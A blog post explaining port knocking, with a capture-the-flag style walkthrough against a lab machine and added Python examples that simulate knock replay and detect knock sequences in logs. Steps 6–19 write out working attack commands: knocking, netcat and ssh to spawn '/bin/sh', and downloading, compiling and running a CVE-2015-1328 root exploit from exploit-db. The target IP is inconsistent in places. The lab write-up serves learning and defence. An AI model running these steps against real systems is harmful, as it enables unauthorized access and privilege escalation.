PORT Knocking Attack
TL;DR
This post explores the nuances of port knocking, a security method used to protect computer systems from unauthorized access attempts. A client sends a pre-defined sequence of connection attempts to specific network ports on the server, and the correct sequence triggers the opening of another port for communication. The technique adds a layer of security by keeping ports closed until the right sequence is received. However, port knocking on its own is not dependable: it is vulnerable to replay and brute-force attacks, so it should be used in combination with other security measures.
What is port knocking?
For information to pass through a port, that port first needs to be open. Keeping ports closed is intended as a barrier to malicious activity, but like many other safeguards, this minor security measure can be bypassed by attackers. Port knocking is what opens these closed ports and allows information to flow through a port that was previously closed.
How does port knocking work?
Port knocking works by sending packets with certain characteristics to a port. These packets are attempted connections to a predefined selection of closed ports, and they can carry specific strings, unusual flags and other distinctive characteristics.
Once those ports have received the packets, the opening of the protected port is normally performed by the organization’s host-based firewall or comparable custom software. This has been observed to trigger both the dynamic opening of listening ports and outbound connections to listening servers on another system.
The different ways to port knock
While all port knocking techniques involve sending signal packets to a port to trigger communication, the methods by which they accomplish this differ. One method, exemplified by the malicious program Cd00r, sniffs for the packets using the **libpcap libraries**. Another lets malware reuse ports already opened by other programs by leveraging raw sockets. Whichever method is used, the result is the same: communication can now move through a previously closed port.
Going a step further, there are different types of port knocks. The most commonly used knocks are:
- Covert knocks: Covert knocks, also known as covert port knocking, are a technique used to conceal the use of port knocking to gain access to a system. The knocking sequence is hidden within normal network traffic, making it harder for network administrators to detect and block. However, using covert knocks raises security concerns and can lead to unauthorized access if not properly secured.
- Dynamic knocks: Dynamic knocks are an advanced form of port knocking that generates a new sequence of connection attempts for every login attempt. This makes it more difficult for attackers to guess or intercept the sequence, thereby improving the security of the system. Dynamic knocks typically require client-side software to generate the connection attempts and can be implemented using various programming languages and protocols. However, they can be more complex to set up and may require additional configuration compared to traditional port knocking.
- One-time knocks: One-time knocks, also known as single-use knocks, are a type of port knocking that generates a unique sequence of connection attempts for each login attempt. Unlike traditional port knocking, where the same sequence is used repeatedly, one-time knocks generate a new sequence each time, making it more difficult for attackers to guess or intercept the sequence. One-time knocks can enhance the security of the system by reducing the risk of replay attacks and unauthorized access. However, they can also be more complex to set up and may require additional configuration compared to traditional port knocking.
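To make the difference between a static sequence and a one-time sequence concrete, here is an added example (not code from the original post) that simulates a knock daemon's per-source state machine with a timeout, then shows a sniffed static sequence being replayed successfully while a one-time sequence is rejected on replay. The one-time sequence is derived from an HMAC over a shared secret and a use counter; that scheme, the window and the addresses are assumptions for the example.

```python
import hashlib, hmac

KNOCK_WINDOW = 10.0  # seconds allowed between first and last knock (assumed policy)

def one_time_sequence(secret: bytes, counter: int, length: int = 4) -> list[int]:
    """Derive a fresh knock sequence from a shared secret and a per-use counter
    (hypothetical scheme; ports are drawn from 10000-59999)."""
    digest = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha256).digest()
    return [10000 + int.from_bytes(digest[2 * i:2 * i + 2], "big") % 50000
            for i in range(length)]

class KnockServer:
    """Tracks each source's progress through the sequence; a full, in-order
    match within KNOCK_WINDOW grants that source access."""
    def __init__(self, sequence, one_time=None):
        self.sequence = list(sequence)   # currently expected sequence
        self.one_time = one_time         # (secret, counter) when sequences rotate per use
        self.progress = {}               # src -> (next index, time of first knock)
        self.allowed = set()             # sources that completed the sequence

    def knock(self, src, port, now):
        idx, start = self.progress.get(src, (0, now))
        if now - start > KNOCK_WINDOW:   # too slow: start over
            idx, start = 0, now
        if port == self.sequence[idx]:
            idx += 1
        else:                            # wrong port resets, but may restart the sequence
            idx, start = (1 if port == self.sequence[0] else 0), now
        if idx < len(self.sequence):
            self.progress[src] = (idx, start)
            return False
        self.allowed.add(src)
        self.progress.pop(src, None)
        if self.one_time:                # rotate: a sniffed sequence is now useless
            secret, counter = self.one_time
            self.one_time = (secret, counter + 1)
            self.sequence = one_time_sequence(secret, counter + 1)
        return True

def replay_demo(one_time: bool):
    """A legitimate client knocks, then an observer who sniffed the ports replays
    them from another address. Returns (client_allowed, replayer_allowed)."""
    secret = b"example-shared-secret"  # constructed value
    seq = one_time_sequence(secret, 0) if one_time else [7000, 8000, 9000]
    srv = KnockServer(seq, (secret, 0) if one_time else None)
    t = 0.0
    for p in seq:                        # legitimate client
        t += 1.0; srv.knock("10.0.0.5", p, t)
    for p in seq:                        # replaying observer, same ports
        t += 1.0; srv.knock("10.0.0.9", p, t)
    return "10.0.0.5" in srv.allowed, "10.0.0.9" in srv.allowed
```

With a static sequence `replay_demo(False)` returns `(True, True)`; with the rotating sequence `replay_demo(True)` returns `(True, False)`.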
Requirements for Demonstrating the Attack:
Starting the Process: 🪓
1.) Scan your network using the netdiscover command and observe the IP address 192.168.1.13 in the network. Please refer to the POC below:
2.) Enumerate the target with an aggressive scan; type the following nmap command:
nmap -p- -A 192.168.1.13
Here I found that only a single port, 80, is open.
3.) Upon discovering that port 80 was open, the browser was opened and the target IP 192.168.1.13 was navigated to. While browsing the page, a link labeled ‘Woah’ was encountered and promptly clicked.
4.) The hyperlink named ‘Woah’ consists of a file named ‘pcap1.pcap’, which was downloaded to discover a clue.
5.) Upon opening the file with Wireshark, it was observed that the VM box attempted to establish connections over TCP ports ‘7000’, ‘8000’, and ‘9000’. However, the attempts made on these ports were ‘discarded’, and some efforts were obstructed with a connection ‘RST’, ‘ACK’. Further analysis revealed that this technique is commonly known as ‘port knocking’.
6.) Send packets to ports ‘7000’, ‘8000’ and ‘9000’ in that order, so that the sequence opens another port. Type the following nmap command to perform a sequential port scan:
nmap -r -p 7000,8000,9000 192.168.1.13
7.) Use the ‘knock’ utility to knock on the specified ports, then use ‘Netcat’ to establish a connection with the newly opened port. Upon connecting, it can be observed that a new ‘directory’ on the web server has been disclosed. Type the following command to knock the ports:
knock -v 192.168.1.13 7000 8000 9000 8888 ; nc 192.168.1.13 7000
8.) Upon discovering the new directory, the browser was used to navigate to ‘192.168.1.25/burgerworld/’. There, another newly found file, ‘pcap2.pcap’, was promptly downloaded.
9.) Once more, I used Wireshark to open the ‘pcap2’ file, but this time I was unable to locate any port knocking sequence. As a result, I picked a packet at random and followed its ‘TCP stream’ by right-clicking on it and selecting the “follow” option.
10.) Capturing the TCP stream revealed an image that points towards another clue. The message is: ‘Can you understand my message?!’.
11.) The message was written in ‘German’, and upon translation, it read ‘one three three seven.’ This could indicate that port 1337 is another potential ‘knocking port’.
12.) Use the ‘knock’ utility to knock on the specified port one more time, and use ‘Netcat’ to establish a connection with it. Observe that port 1337 gets opened, which points towards ‘/iamcornholio/’.
13.) Next, investigate ‘192.168.1.25/iamcornholio/’. During this inspection, a base64-encoded string was discovered. Decoding this string is necessary to progress further.
14.) The string was decoded, revealing another port knocking sequence. To decode the string, use the following command:
echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" | base64 -d
15.) The previous port knocking technique was leveraged again:
knock -v 192.168.1.13 8888 9999 7777 6666; ssh 192.168.1.13
16.) Logging in using the ‘disclosed credentials’ worked, but the session closed almost immediately.
17.) The following command was executed, successfully spawning a shell on the target:
knock -v 192.168.1.13 8888 9999 7777 6666; ssh [email protected] "/bin/sh"
18.) After logging in successfully, the kernel version was identified as 3.13.0, and reading the ‘nachos’ file revealed the message ‘Obtained a lower shell; the objective is to attain root access’. Commands used:
uname -a
cat nachos
19.) The kernel version revealed susceptibility to ‘CVE-2015-1328’, which enables local privilege escalation through overlay mounts in user namespaces. Exploiting this flaw results in administrative privileges and allows capturing the flag. Commands used:
wget https://www.exploit-db.com/download/37292
ls
mv 37292 priv.c
gcc priv.c -o priv
./priv
id
cd /root
ls
cat SECRETZ
MITIGATION
To prevent port knocking from being exploited, apply the following mitigations:
- Implement secure and complex knock sequences
- Use multi-factor authentication
- Enforce IP restrictions
- Monitor network traffic for suspicious behavior
- Implement a VPN or firewall rules that only allow authorized IP addresses to access specific ports
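The three dropped connection attempts to 7000, 8000 and 9000 observed in the pcap in step 5, followed by a successful connection, are exactly the pattern the monitoring bullet above asks you to watch for. The following added example (not part of the original post) runs that detection over constructed firewall-style log lines; the log format, the thresholds and the addresses are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed firewall-style log (not from the original post). Assumed format:
# "<epoch> <DROP|ACCEPT> <src> -> <dst>:<port>"; DROP lines are SYNs to closed ports.
SAMPLE_LOG = """\
1700000001 DROP 192.168.1.50 -> 192.168.1.13:7000
1700000002 DROP 192.168.1.50 -> 192.168.1.13:8000
1700000003 DROP 192.168.1.50 -> 192.168.1.13:9000
1700000004 ACCEPT 192.168.1.50 -> 192.168.1.13:8888
1700000010 DROP 192.168.1.77 -> 192.168.1.13:445
1700000300 DROP 192.168.1.77 -> 192.168.1.13:3389
1700000301 ACCEPT 192.168.1.77 -> 192.168.1.13:80
"""
LINE_RE = re.compile(r"^(\d+) (DROP|ACCEPT) (\S+) -> (\S+):(\d+)$")

def parse(log):
    """Yield (timestamp, action, src, dst, port) for each well-formed line; skip the rest."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield int(m[1]), m[2], m[3], m[4], int(m[5])

def find_knock_sequences(log, min_ports=3, window=10):
    """Flag sources whose drops to >= min_ports distinct closed ports within
    `window` seconds are followed by an accepted connection: the signature of
    a knock sequence opening a port. Returns {src: knocked_ports + [opened_port]}."""
    drops = defaultdict(list)   # src -> [(ts, port)]
    findings = {}
    for ts, action, src, dst, port in parse(log):
        if action == "DROP":
            drops[src].append((ts, port))
            continue
        recent = [p for t, p in drops[src] if ts - t <= window]
        distinct = list(dict.fromkeys(recent))   # keep knock order, drop repeats
        if len(distinct) >= min_ports:
            findings[src] = distinct + [port]
    return findings
```

On the sample log only 192.168.1.50 is flagged, with the sequence 7000, 8000, 9000 and the opened port 8888; the second source's scattered drops fall outside the window.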
~ Kartik